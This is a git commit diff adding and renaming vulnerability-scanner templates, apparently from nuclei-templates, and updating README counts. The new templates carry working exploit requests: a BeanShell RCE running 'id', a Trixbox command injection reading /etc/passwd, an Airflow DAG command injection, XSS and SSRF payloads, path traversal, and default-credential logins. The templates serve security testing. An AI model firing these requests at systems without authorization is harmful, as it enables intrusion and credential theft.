commit
ac8029636e
12
README.md
12
README.md
|
@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||||
| cves | 321 | vulnerabilities | 170 | exposed-panels | 137 |
|
| cves | 329 | vulnerabilities | 175 | exposed-panels | 146 |
|
||||||
| takeovers | 67 | exposures | 104 | technologies | 77 |
|
| takeovers | 67 | exposures | 105 | technologies | 98 |
|
||||||
| misconfiguration | 66 | workflows | 31 | miscellaneous | 22 |
|
| misconfiguration | 66 | workflows | 32 | miscellaneous | 22 |
|
||||||
| default-logins | 28 | exposed-tokens | 0 | dns | 8 |
|
| default-logins | 30 | exposed-tokens | 0 | dns | 9 |
|
||||||
| fuzzing | 9 | helpers | 8 | iot | 12 |
|
| fuzzing | 9 | helpers | 8 | iot | 13 |
|
||||||
|
|
||||||
**108 directories, 1148 files**.
|
**111 directories, 1207 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
@ -1,11 +1,12 @@
|
||||||
id: xiuno-bbs-reinstallation
|
id: CNVD-2019-01348
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Xiuno BBS CNVD-2019-01348
|
name: Xiuno BBS CNVD-2019-01348
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: medium
|
severity: medium
|
||||||
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
|
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
|
||||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
||||||
tags: xiuno
|
tags: xiuno,cnvd
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
|
@ -1,16 +1,18 @@
|
||||||
id: xunchi-file-read
|
id: CNVD-2020-23735
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Xxunchi LFR (CNVD-2019-01348
|
name: Xxunchi Local File read
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: medium
|
severity: medium
|
||||||
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
|
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
|
||||||
reference: https://www.cnvd.org.cn/flaw/show/2025171
|
reference: https://www.cnvd.org.cn/flaw/show/2025171
|
||||||
tags: xunchi,lfi
|
tags: xunchi,lfi,cnvd
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
|
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
@ -21,4 +23,4 @@ requests:
|
||||||
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
|
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
|
||||||
- "display_errors"
|
- "display_errors"
|
||||||
part: body
|
part: body
|
||||||
condition: and
|
condition: and
|
|
@ -1,11 +1,11 @@
|
||||||
id: ruijie-smartweb-default-password
|
id: CNVD-2020-56167
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Ruijie Smartweb Default Password
|
name: Ruijie Smartweb Default Password
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: low
|
severity: low
|
||||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
|
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
|
||||||
tags: ruijie,default-login
|
tags: ruijie,default-login,cnvd
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
|
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
|
||||||
tags: lfi
|
tags: lfi,cnvd
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
|
@ -1,11 +1,11 @@
|
||||||
id: weiphp-path-traversal
|
id: CNVD-2020-68596
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: WeiPHP 5.0 Path Traversal
|
name: WeiPHP 5.0 Path Traversal
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: critical
|
severity: critical
|
||||||
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
|
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
|
||||||
tags: weiphp,lfi
|
tags: weiphp,lfi,cnvd
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
|
@ -1,11 +1,11 @@
|
||||||
id: eea-disclosure
|
id: CNVD-2021-10543
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: EEA Information Disclosure
|
name: EEA Information Disclosure
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
|
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
|
||||||
tags: config,exposure
|
tags: config,exposure,cnvd
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
|
@ -1,11 +1,11 @@
|
||||||
id: ruijie-smartweb-disclosure
|
id: CNVD-2021-17369
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Ruijie Smartweb Management System Password Information Disclosure
|
name: Ruijie Smartweb Management System Password Information Disclosure
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
|
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
|
||||||
tags: ruijie,disclosure
|
tags: ruijie,disclosure,cnvd
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
|
@ -0,0 +1,45 @@
|
||||||
|
id: CNVD-2021-30167
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: UFIDA NC BeanShell Remote Code Execution
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
reference: |
|
||||||
|
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
|
||||||
|
- https://www.cnvd.org.cn/webinfo/show/6491
|
||||||
|
tags: beanshell,rce,cnvd
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- | #linux
|
||||||
|
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
bsh.script=exec("id");
|
||||||
|
|
||||||
|
- | #windows
|
||||||
|
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
bsh.script=exec("ipconfig");
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "uid="
|
||||||
|
- "Windows IP"
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "BeanShell Test Servlet"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2017-14535
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
reference: |
|
||||||
|
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
|
||||||
|
- https://www.exploit-db.com/exploits/49913
|
||||||
|
tags: cve,cve2017,trixbox,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: de,en-US;q=0.7,en;q=0.3
|
||||||
|
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
|
||||||
|
Connection: close
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,21 @@
|
||||||
|
id: CVE-2017-3528
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: low
|
||||||
|
reference: |
|
||||||
|
- https://blog.zsec.uk/cve-2017-3528/
|
||||||
|
- https://www.exploit-db.com/exploits/43592
|
||||||
|
tags: oracle,redirect
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'noresize src="/\example.com?configName='
|
||||||
|
part: body
|
|
@ -11,12 +11,16 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
|
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
|
||||||
|
headers:
|
||||||
|
Accept-Encoding: deflate
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "///sessions"
|
- "///sessions"
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
id: circarlife-system-log
|
id: CVE-2018-12634
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Exposed CirCarLife System Log
|
name: Exposed CirCarLife System Log
|
||||||
|
@ -6,7 +6,7 @@ info:
|
||||||
description: CirCarLife is an internet-connected electric vehicle charging station
|
description: CirCarLife is an internet-connected electric vehicle charging station
|
||||||
reference: https://circontrol.com/
|
reference: https://circontrol.com/
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: scada,circontrol,circarlife,logs
|
tags: cve,cve2018,scada,circontrol,circarlife,logs
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
|
@ -0,0 +1,64 @@
|
||||||
|
id: CVE-2020-11978
|
||||||
|
info:
|
||||||
|
name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution
|
||||||
|
author: pdteam
|
||||||
|
severity: high
|
||||||
|
description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
|
||||||
|
reference: |
|
||||||
|
- https://github.com/pberba/CVE-2020-11978
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-11978
|
||||||
|
- https://twitter.com/wugeej/status/1400336603604668418
|
||||||
|
tags: cve,cve2020,apache,airflow,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /api/experimental/test HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Connection: close
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Connection: close
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Connection: close
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Content-Length: 85
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"conf": {"message": "\"; touch test #"}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Connection: close
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: exec_date
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
internal: true
|
||||||
|
regex:
|
||||||
|
- '"execution_date":"([0-9-A-Z:+]+)"'
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body_4, "operator":"BashOperator")'
|
||||||
|
- 'contains(all_headers_4, "application/json")'
|
||||||
|
condition: and
|
|
@ -1,18 +1,20 @@
|
||||||
id: airflow-api-exposure
|
id: CVE-2020-13927
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Apache Airflow API Exposure / Unauthenticated Access
|
name: Unauthenticated Airflow Experimental REST API
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: apache,airflow,unauth
|
tags: cve,cve2020,apache,airflow,unauth
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/api/experimental/latest_runs'
|
- '{{BaseURL}}/api/experimental/latest_runs'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- '"dag_run_url":'
|
- '"dag_run_url":'
|
||||||
- '{"items":['
|
- '"dag_id":'
|
||||||
|
- '"items":'
|
||||||
condition: and
|
condition: and
|
|
@ -3,7 +3,7 @@ id: CVE-2020-36112
|
||||||
info:
|
info:
|
||||||
name: CSE Bookstore 1.0 SQL Injection
|
name: CSE Bookstore 1.0 SQL Injection
|
||||||
author: geeknik
|
author: geeknik
|
||||||
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database.
|
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
|
||||||
reference: |
|
reference: |
|
||||||
- https://www.exploit-db.com/exploits/49314
|
- https://www.exploit-db.com/exploits/49314
|
||||||
- https://www.tenable.com/cve/CVE-2020-36112
|
- https://www.tenable.com/cve/CVE-2020-36112
|
||||||
|
|
|
@ -0,0 +1,21 @@
|
||||||
|
id: CVE-2020-6308
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Unauthenticated Blind SSRF in SAP
|
||||||
|
author: madrobot
|
||||||
|
severity: medium
|
||||||
|
reference: https://github.com/InitRoot/CVE-2020-6308-PoC
|
||||||
|
tags: cve,cve2020,sap,ssrf,oob
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
|
||||||
|
|
||||||
|
body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the DNS Interaction
|
||||||
|
words:
|
||||||
|
- "dns"
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2021-21985
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: VMware vSphere Client (HTML5) RCE
|
||||||
|
author: D0rkerDevil
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
|
||||||
|
reference: |
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-21985
|
||||||
|
- https://www.vmware.com/security/advisories/VMSA-2021-0010.html
|
||||||
|
- https://github.com/alt3kx/CVE-2021-21985_PoC
|
||||||
|
tags: cve,cve2021,rce,vsphere
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept: */*
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 86
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '{"result":{"isDisconnected":'
|
||||||
|
part: body
|
|
@ -23,6 +23,7 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//"
|
- "{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//"
|
||||||
|
- "{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('nuclei');//"
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
@ -30,4 +31,4 @@ requests:
|
||||||
- "nuclei"
|
- "nuclei"
|
||||||
- "No policy has been chosen."
|
- "No policy has been chosen."
|
||||||
condition: and
|
condition: and
|
||||||
part: body
|
part: body
|
||||||
|
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2021-24316
|
||||||
|
|
||||||
|
info:
|
||||||
|
author: 0x_Akoko
|
||||||
|
description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
|
||||||
|
name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
|
||||||
|
severity: medium
|
||||||
|
tags: cve,cve2021,mediumish,xss,wordpress
|
||||||
|
reference: |
|
||||||
|
- https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
|
||||||
|
- https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E '
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(/{{randstr}}/)</script>"
|
||||||
|
- "Sorry, no posts matched your criteria."
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
|
@ -0,0 +1,61 @@
|
||||||
|
id: airflow-default-credentials
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Airflow Default Credentials
|
||||||
|
author: pdteam
|
||||||
|
severity: critical
|
||||||
|
tags: airflow,default-login
|
||||||
|
reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /admin/airflow/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Origin: {{BaseURL}}
|
||||||
|
Connection: close
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /admin/airflow/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Length: 152
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Origin: {{BaseURL}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Referer: {{BaseURL}}/admin/airflow/login
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-IN,en;q=0.9
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
username=airflow&password=airflow&_csrf_token={{csrf_token}}
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: csrf_token
|
||||||
|
group: 1
|
||||||
|
part: body
|
||||||
|
internal: true
|
||||||
|
regex:
|
||||||
|
- 'csrf_token" type="hidden" value="([A-Za-z0-9.-]+)">'
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "session=."
|
||||||
|
- "/admin/"
|
||||||
|
part: header
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'You should be redirected automatically to target URL: <a href="/admin/">/admin/</a>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 302
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: arl-default-password
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ARL Default Password
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
tags: arl,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/api/user/login"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/json; charset=UTF-8
|
||||||
|
body: |
|
||||||
|
{"username":"admin","password":"arlpass"}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '"message": "success"'
|
||||||
|
- '"username": "admin"'
|
||||||
|
- '"type": "login"'
|
||||||
|
condition: and
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: szhe-default-password
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Szhe Default Password
|
||||||
|
author: pikpikcu
|
||||||
|
severity: low
|
||||||
|
tags: szhe,default-login
|
||||||
|
vendor: https://github.com/Cl0udG0d/SZhe_Scan
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/login/"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
body: |
|
||||||
|
email=springbird@qq.com&password=springbird&remeber=true
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'You should be redirected automatically to target URL: <a href="/">/</a>'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'Set-Cookie: session'
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 302
|
|
@ -0,0 +1,172 @@
|
||||||
|
id: dns-waf-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: DNS WAF Detection
|
||||||
|
author: lu4nx
|
||||||
|
severity: info
|
||||||
|
tags: tech,waf,dns
|
||||||
|
|
||||||
|
dns:
|
||||||
|
- name: "{{FQDN}}"
|
||||||
|
type: CNAME
|
||||||
|
recursion: true
|
||||||
|
retries: 5
|
||||||
|
class: inet
|
||||||
|
|
||||||
|
- name: "{{FQDN}}"
|
||||||
|
type: NS
|
||||||
|
recursion: true
|
||||||
|
retries: 5
|
||||||
|
class: inet
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
name: sanfor-shield
|
||||||
|
words:
|
||||||
|
- ".sangfordns.com"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: 360panyun
|
||||||
|
words:
|
||||||
|
- ".360panyun.com"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: baiduyun
|
||||||
|
words:
|
||||||
|
- ".yunjiasu-cdn.net"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: chuangyudun
|
||||||
|
words:
|
||||||
|
- ".365cyd.cn"
|
||||||
|
- ".cyudun.net"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: knownsec
|
||||||
|
words:
|
||||||
|
- ".jiashule.com"
|
||||||
|
- ".jiasule.org"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: huaweicloud
|
||||||
|
words:
|
||||||
|
- ".huaweicloudwaf.com"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: xinliuyun
|
||||||
|
words:
|
||||||
|
- ".ngaagslb.cn"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: chinacache
|
||||||
|
words:
|
||||||
|
- ".chinacache.net"
|
||||||
|
- ".ccgslb.net"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: nscloudwaf
|
||||||
|
words:
|
||||||
|
- ".nscloudwaf.com"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: wangsu
|
||||||
|
words:
|
||||||
|
- ".wsssec.com"
|
||||||
|
- ".lxdns.com"
|
||||||
|
- ".wscdns.com"
|
||||||
|
- ".cdn20.com"
|
||||||
|
- ".cdn30.com"
|
||||||
|
- ".ourplat.net"
|
||||||
|
- ".wsdvs.com"
|
||||||
|
- ".wsglb0.com"
|
||||||
|
- ".wswebcdn.com"
|
||||||
|
- ".wswebpic.com"
|
||||||
|
- ".wsssec.com"
|
||||||
|
- ".wscloudcdn.com"
|
||||||
|
- ".mwcloudcdn.com"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: qianxin
|
||||||
|
words:
|
||||||
|
- ".360safedns.com"
|
||||||
|
- ".360cloudwaf.com"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: baiduyunjiasu
|
||||||
|
words:
|
||||||
|
- ".yunjiasu-cdn.net"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: anquanbao
|
||||||
|
words:
|
||||||
|
- ".anquanbao.net"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: aliyun
|
||||||
|
regex:
|
||||||
|
- '\.w\.kunlun\w{2,3}\.com'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: aliyun-waf
|
||||||
|
regex:
|
||||||
|
- '\.aliyunddos\d+\.com'
|
||||||
|
- '\.aliyunwaf\.com'
|
||||||
|
- '\.aligaofang\.com'
|
||||||
|
- '\.aliyundunwaf\.com'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: xuanwudun
|
||||||
|
words:
|
||||||
|
- ".saaswaf.com"
|
||||||
|
- ".dbappwaf.cn"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: yundun
|
||||||
|
words:
|
||||||
|
- ".hwwsdns.cn"
|
